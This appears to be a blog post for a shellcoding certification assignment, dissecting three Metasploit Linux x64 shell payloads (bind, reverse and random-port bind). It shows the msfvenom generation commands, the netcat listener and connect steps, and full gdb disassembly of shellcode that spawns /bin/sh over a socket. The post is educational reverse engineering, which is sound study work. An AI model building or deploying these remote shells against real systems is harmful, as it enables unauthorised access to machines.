This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :<\/p>\n
http:\/\/www.securitytube-\u00adtraining.com\/online-\u00adcourses\/x8664-\u00adassembly-\u00adand-\u00adshellcoding-\u00adon-\u00adlinux\/index.html<\/p>\n
Student ID: PA-6470<\/p>\n
The aim of this assignment is to dissect functionnality of 3 payloads from Metasploit.<\/p>\n
The tool msfpayload has been replaced by msfvenom.<\/p>\n
So first, I just list all linux x64 payloads using msfvenom :<\/p>\n
msfvenom -l payload | grep linux\/x64\r\n linux\/x64\/exec Execute an arbitrary command\r\n linux\/x64\/meterpreter\/bind_tcp Inject the mettle server payload (staged). Listen for a connection\r\n linux\/x64\/meterpreter\/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker\r\n linux\/x64\/meterpreter_reverse_http Run the Meterpreter \/ Mettle server payload (stageless)\r\n linux\/x64\/meterpreter_reverse_https Run the Meterpreter \/ Mettle server payload (stageless)\r\n linux\/x64\/meterpreter_reverse_tcp Run the Meterpreter \/ Mettle server payload (stageless)\r\n linux\/x64\/shell\/bind_tcp Spawn a command shell (staged). Listen for a connection\r\n linux\/x64\/shell\/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\r\n linux\/x64\/shell_bind_tcp Listen for a connection and spawn a command shell\r\n linux\/x64\/shell_bind_tcp_random_port Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.\r\n linux\/x64\/shell_find_port Spawn a shell on an established connection\r\n linux\/x64\/shell_reverse_tcp Connect back to attacker and spawn a command shell<\/pre>\nI’ve chosen to do the analysis of the following payloads :<\/p>\n
First, I generate the payload\u00a0 :<\/p>\n
msfvenom -a x64 --platform linux -p linux\/x64\/shell_bind_tcp -f elf > shell_bind_tcp\r\nNo encoder or badchars specified, outputting raw payload\r\nPayload size: 86 bytes\r\nFinal size of elf file: 206 bytes<\/pre>\nThen I’ve tested it :<\/p>\n
On the target :\r\nchmod +x shell_bind_tcp \r\n.\/shell_bind_tcp<\/pre>\nOn my computer :\r\nnc <Target IP> 4444<\/pre>\nIn order to dissect the code, I first search entry point address from the binary :<\/p>\n
readelf -a .\/shell_bind_tcp \r\nELF Header:\r\n Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 \r\n Class: ELF64\r\n Data: 2's complement, little endian\r\n Version: 1 (current)\r\n OS\/ABI: UNIX - System V\r\n ABI Version: 0\r\n Type: EXEC (Executable file)\r\n Machine: Advanced Micro Devices X86-64\r\n Version: 0x1\r\n Entry point address: 0x400078<\/strong>\r\n Start of program headers: 64 (bytes into file)\r\n Start of section headers: 0 (bytes into file)\r\n Flags: 0x0\r\n Size of this header: 64 (bytes)\r\n Size of program headers: 56 (bytes)\r\n Number of program headers: 1\r\n Size of section headers: 0 (bytes)\r\n Number of section headers: 0\r\n Section header string table index: 0<\/pre>\nI then debug the code under gdb<\/p>\n
gdb .\/shell_bind_tcp\r\nbreak *0x400078\r\nset disassembly-flavor intel\r\nrun\r\nlayout asm\r\nlayout regs<\/pre>\nAnalysis :<\/p>\n
1) Open a socket stream<\/p>\n
B+>\u25020x400078 push 0x29 \r\n \u25020x40007a pop rax \r\n \u25020x40007b cdq \r\n \u25020x40007c push 0x2 \r\n \u25020x40007e pop rdi \r\n \u25020x40007f push 0x1 \r\n \u25020x400081 pop rsi \r\n \u25020x400082 syscall<\/pre>\nsys_socket (rax = 0x29) int family (rdi = 0x02) int type (rsi = 0x01) int protocol (rdx = 0x00)<\/p>\n
2) Bind TCP socket on port 4444<\/p>\n
>\u25020x400084 xchg rdi,rax \r\n \u25020x400086 push rdx \r\n \u25020x400087 mov DWORD PTR [rsp],0x5c110002 \r\n \u25020x40008e mov rsi,rsp \r\n \u25020x400091 push 0x10 \r\n \u25020x400093 pop rdx \r\n \u25020x400094 push 0x31 \r\n \u25020x400096 pop rax \r\n \u25020x400097 syscall<\/pre>\nsys_bind (rax = 49) int fd (rdi) struct sokaddr *umyaddr (rsi) int addrlen (rdx = 0x10)<\/p>\n
where rsi points to stack with C structure :<\/p>\n
struct sockaddr_in {\r\n uint8_t sin_len; \/* total length *\/\r\n sa_family_t sin_family; \/* family : AF_INET *\/\r\n in_port_t sin_port; \/* port number *\/\r\n struct in_addr sin_addr; \/* inet address *\/\r\n unsigned char sin_zero[8]; \/* 8 zeros *\/\r\n};<\/pre>\nsin_addr = 0 (push rdx) = INADDR_ANY = any address for binding<\/p>\n
>\u25020x400084 xchg rdi,rax \r\n \u25020x400086 push rdx<\/pre>\nsin_port = 4444 (0x5c11 is the reverse byte order of 0x115c = 4444)
\nmov DWORD PTR [rsp],0x5c110002<\/p>\nsin_family = 2 = AF_INET
\nmov DWORD PTR [rsp],0x5c110002<\/p>\nsin_len = 0x10
\npush 0x10
\npop rdx<\/p>\n3) Socket listen<\/p>\n
\u25020x400099 push 0x32 \r\n \u25020x40009b pop rax \r\n \u25020x40009c syscall<\/pre>\nsyscall sys_listen (rax = 50) int fd int backlog<\/p>\n
4) Accept connection<\/p>\n
\u25020x40009e xor rsi,rsi \r\n\u25020x4000a1 push 0x2b \r\n\u25020x4000a3 pop rax \r\n\u25020x4000a4 syscall<\/pre>\nsys_accept (rax = 43) int fd struct sockaddr *upeer_sockaddr int *upeer_addrlen<\/p>\n
5) Duplicate socket (stdin, stout, stderr)\r\n \r\n >\u25020x4000a6 xchg rdi,rax \r\n \u25020x4000a8 push 0x3 \r\n \u25020x4000aa pop rsi \r\n \u25020x4000ab dec rsi \r\n \u25020x4000ae push 0x21 \r\n \u25020x4000b0 pop rax \r\n \u25020x4000b1 syscall<\/pre>\nsys_dup2 (rax = 33) unsigned int oldfd unsigned int newfd<\/p>\n
6) Shellcode part<\/p>\n
Call to sys_execve (rax = 59) const char *filename const char *const argv[] const char *<\/p>\n
Execute \/bin\/sh which is hs\/nib\/ in reverse byte order or 0x68732f6e69622f in hexa<\/p>\n
0x4000b3 jne 0x4000ab \r\n \u25020x4000b5 push 0x3b \r\n \u25020x4000b7 pop rax \r\n \u25020x4000b8 cdq \r\n \u25020x4000b9 movabs rbx,0x68732f6e69622f \r\n \u25020x4000c3 push rbx \r\n \u25020x4000c4 mov rdi,rsp \r\n \u25020x4000c7 push rdx \r\n \u25020x4000c8 push rdi \r\n \u25020x4000c9 mov rsi,rsp \r\n \u25020x4000cc syscall<\/pre>\nAnalysis of linux\/x64\/shell_reverse_tcp<\/h2>\n
First, I generate the payload :<\/p>\n
msfvenom -a x64 --platform linux -p linux\/x64\/shell_reverse_tcp -f elf > shell_reverse_tcp<\/pre>\nThen I’ve tested it :<\/p>\n
My computer :\r\nnc -nlvp 4444<\/pre>\nTarget :\r\nchmod +x shell_reverse_tcp \r\n.\/shell_reverse_tcp<\/pre>\nThen in order to dissect the code, I debug it with gdb<\/p>\n
gdb .\/shell_reverse_tcp\r\nbreak *0x400078\r\nset disassembly-flavor intel\r\nrun\r\nlayout asm\r\nlayout regs<\/pre>\nAnalysis :<\/p>\n
1) Open a socket stream<\/p>\n
B+>\u25020x400078 push 0x29 \r\n \u25020x40007a pop rax \r\n \u25020x40007b cdq \r\n \u25020x40007c push 0x2 \r\n \u25020x40007e pop rdi \r\n \u25020x40007f push 0x1 \r\n \u25020x400081 pop rsi \r\n \u25020x400082 syscall<\/pre>\nsys_socket (rax = 0x29) int family (rdi = 0x02) int type (rsi = 0x01) int protocol (rdx = 0x00)<\/p>\n
2) Connect socket to port 4444 on localhost<\/p>\n
\u25020x400084 xchg rdi,rax \r\n \u25020x400086 movabs rcx,0x2801a8c05c110002 \r\n \u25020x400090 push rcx \r\n \u25020x400091 mov rsi,rsp \r\n \u25020x400094 push 0x10 \r\n \u25020x400096 pop rdx \r\n \u25020x400097 push 0x2a \r\n \u25020x400099 pop rax \r\n \u25020x40009a syscall<\/pre>\n\u25020x400084 xchg rdi,rax<\/pre>\nKeep socket stream fd<\/p>\n
\u25020x400086 movabs rcx,0x2801a8c05c110002 \r\n \u25020x400090 push rcx \r\n \u25020x400091 mov rsi,rsp<\/pre>\nrsi points to stack with C structure :<\/p>\n
struct sockaddr_in {\r\n uint8_t sin_len; \/* total length *\/\r\n sa_family_t sin_family; \/* family : AF_INET *\/\r\n in_port_t sin_port; \/* port number *\/\r\n struct in_addr sin_addr; \/* inet address *\/\r\n unsigned char sin_zero[8]; \/* 8 zeros *\/\r\n};\r\n \r\nsin_family = 2 = AF_INET \r\nsin_port = 4444 (0x5c11 is the reverse byte order of 0x115c = 4444)\r\nsin_addr = 2801a8c0 = 192.168.1.40 in reverse order\r\n\r\n\u25020x400094 push 0x10 \r\n\u25020x400096 pop rdx<\/pre>\nPut addrlen on stack<\/p>\n
\u25020x400097 push 0x2a \r\n \u25020x400099 pop rax \r\n \u25020x40009a syscall<\/pre>\nsys_connect (rax = 0x2a) int fd (rdi = rax = socket stream) struct sockaddr *uservaddr (rsi) int addrlen (rdx = 0x10)<\/p>\n
3) Duplicate socket (stdin, stout, stderr)<\/p>\n
\u25020x40009c push 0x3 \r\n \u25020x40009e pop rsi \r\n \u25020x40009f dec rsi \r\n \u25020x4000a2 push 0x21 \r\n \u25020x4000a4 pop rax \r\n \u25020x4000a5 syscall<\/pre>\nsys_dup2 (rax = 33) unsigned int oldfd unsigned int newfd<\/p>\n
4) Shellcode part<\/p>\n
Call to sys_execve (rax = 59) const char *filename const char *const argv[] const char *<\/p>\n
Execute \/bin\/sh which is hs\/nib\/ in reverse byte order or 0x68732f6e69622f in hexa<\/p>\n
\u25020x4000a7 jne 0x40009f \r\n \u25020x4000a9 push 0x3b \r\n \u25020x4000ab pop rax \r\n \u25020x4000ac cdq \r\n \u25020x4000ad movabs rbx,0x68732f6e69622f \r\n \u25020x4000b7 push rbx \r\n \u25020x4000b8 mov rdi,rsp \r\n \u25020x4000bb push rdx \r\n \u25020x4000bc push rdi \r\n \u25020x4000bd mov rsi,rsp \r\n \u25020x4000c0 syscall<\/pre>\nAnalysis of linux\/x64\/shell_bind_tcp_random_port<\/h2>\n
First, I generate the payload :<\/p>\n
msfvenom -a x64 --platform linux -p linux\/x64\/shell_bind_tcp_random_port -f elf > shell_bind_tcp_random_port\r\n\r\nNo encoder or badchars specified, outputting raw payload\r\nPayload size: 57 bytes\r\nFinal size of elf file: 177 bytes<\/pre>\nThen I’ve tested it :<\/p>\n
Target :\r\nchmod +x shell_bind_tcp_random_port \r\n.\/shell_bind_tcp_random_port<\/pre>\nMy computer :\r\n\r\nSearch port :\r\nnmap -sS <Target> -p-\r\n\r\nConnect to target :\r\nnc <Target IP> <Port><\/pre>\nThen in order to dissect the code, I debug it with gdb :<\/p>\n
gdb .\/shell_bind_tcp_random_port\r\nbreak *0x400078\r\nset disassembly-flavor intel\r\nrun\r\nlayout asm\r\nlayout regs<\/pre>\nAnalysis :<\/p>\n
1) Open a socket stream<\/p>\n
B+>\u25020x400078 xor rsi,rsi \r\n \u25020x40007b mul rsi \r\n \u25020x40007e inc esi \r\n \u25020x400080 push 0x2 \r\n \u25020x400082 pop rdi \r\n \u25020x400083 mov al,0x29 \r\n \u25020x400085 syscall<\/pre>\nsys_socket (rax = 41) int family (rdi = 0x02) int type (rsi = 0x01) int protocol (rdx = 0x00)<\/p>\n
2) Socket listen<\/p>\n
\u25020x400087 push rdx \r\n\u25020x400088 pop rsi \r\n\u25020x400089 push rax \r\n\u25020x40008a pop rdi \r\n\u25020x40008b mov al,0x32 \r\n\u25020x40008d syscall<\/pre>\nsyscall sys_listen (rax = 50) int fd int backlog<\/p>\n
Socket listen on random port<\/p>\n
3) Accept connection<\/p>\n
\u25020x40008f mov al,0x2b \r\n\u25020x400091 syscall<\/pre>\nsys_accept (rax = 43) int fd struct sockaddr *upeer_sockaddr int *upeer_addrlen<\/p>\n
Process is waiting connexion<\/p>\n
4) Duplicate socket (stdin, stout, stderr)<\/p>\n
\u25020x400093 push rdi \r\n\u25020x400094 pop rsi \r\n\u25020x400095 xchg rdi,rax \r\n\u25020x400097 dec esi \r\n\u25020x400099 mov al,0x21 \r\n\u25020x40009b syscall<\/pre>\nsys_dup2 (rax = 33) unsigned int oldfd unsigned int newfd<\/p>\n
5) Shellcode part<\/p>\n
Call to sys_execve (rax = 59) const char *filename const char *const argv[] const char *<\/p>\n
Execute \/bin\/sh which is hs\/nib\/ in reverse byte order or 0x68732f6e69622f in hexa<\/p>\n
\u25020x40009d jne 0x400097 \r\n\u25020x40009f push rdx \r\n\u25020x4000a0 movabs rdi,0x68732f6e69622f2f \r\n\u25020x4000aa push rdi \r\n\u25020x4000ab push rsp \r\n\u25020x4000ac pop rdi \r\n\u25020x4000ad mov al,0x3b \r\n\u25020x4000af syscall<\/pre>\n","protected":false},"excerpt":{"rendered":"This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification : http:\/\/www.securitytube-\u00adtraining.com\/online-\u00adcourses\/x8664-\u00adassembly-\u00adand-\u00adshellcoding-\u00adon-\u00adlinux\/index.html Student ID: PA-6470 Assignment #5 The aim of this assignment is to dissect functionnality of 3 payloads from Metasploit. The tool msfpayload has been replaced by msfvenom. So first, I just list all linux x64 payloads … Continuer la lecture de SLAE64 – Assignment #5 – Reverse Engineering Msfpayload Shellcodes<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-213","post","type-post","status-publish","format-standard","hentry","category-slae64"],"_links":{"self":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/213","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=213"}],"version-history":[{"count":7,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/213\/revisions"}],"predecessor-version":[{"id":302,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/213\/revisions\/302"}],"wp:attachment":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=213"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=213"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=213"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}